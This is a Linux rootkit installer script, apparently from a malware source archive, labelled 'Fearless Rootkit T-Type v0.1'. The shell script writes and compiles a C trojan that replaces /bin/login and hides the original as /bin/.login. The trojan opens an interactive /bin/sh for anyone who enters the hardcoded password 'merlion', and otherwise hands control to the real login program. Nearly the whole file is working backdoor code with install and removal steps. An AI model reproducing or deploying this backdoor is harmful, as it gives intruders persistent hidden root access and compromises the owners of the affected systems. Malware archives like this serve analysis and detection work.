MalwareSourceCode/Linux/Backdoor.Linux.Rootin.a

#!/bin/sh

# Fearless Rootkit T-Type v0.1
# Coded by Merlion  merld_one@yahoo.com
# To run:
# chmod 755 droprk.sh
# ./droprk.sh
# Telnet to login daemon (port 513) and enter password
# Have fun!

arg="$1"
if [ "$arg" = "" ]; then
echo "Usage is: ./droprk -i (to install) -r (to uninstall)"
exit 1
elif [ "$arg" = "-r" ]; then
test -e /bin/.login && rm -f /bin/login; mv /bin/.login /bin/login; exit 0 || echo "Not installed"
elif [ $arg = "-i" ]; then

cat > /tmp/drop.c << EOF

#include <stdio.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <fcntl.h>		/* For daemon related functions */

#define REAL "/bin/.login"
#define TROJAN "/bin/login"
#define ROOT "merlion"

char **execute;
char passwd[8];

main(int argc, char **argv) {

void die(char *error);
void connection();

pid_t pid, sid;			/* Daemon variables */

signal(SIGALRM,connection);
alarm(1);
execute=argv;
*execute=TROJAN;

if ((pid=fork()) < 0) die("Error on fork()");	   /* Start daemon process */
if (pid > 0) exit(0); 				   /* Exit parent process */
if ((sid=setsid()) < 0) die("Error on setsid()");  /* Create new session */
if ((chdir("/") < 0)) die("Error on chdir()");	   /* Set working directory */
umask(0);	/* Set umask to 0 to avoid unwanted rights inheritance */
close(STDIN_FILENO);		/*    Close			*/
close(STDOUT_FILENO);		/*    associated   		*/
close(STDERR_FILENO);		/*    file streams		*/
/* On our own now */

scanf("%s", passwd);
if (strcmp(passwd,ROOT) == 0) {
alarm(0);
execl("/bin/sh","/bin/sh","-i",0);
exit(0);  }	/* Remove?? */
else {
execv(REAL,execute);
exit(0);  }  /* Remove?? */
}

void connection() {
execv(REAL,execute);
exit(0);  }

void die(char *error)  {
perror(error);
exit(1); }

EOF

fi 

gcc -o /tmp/login /tmp/drop.c
rm -f /tmp/drop.c
mv /bin/login /bin/.login
mv /tmp/login /bin/

exit 0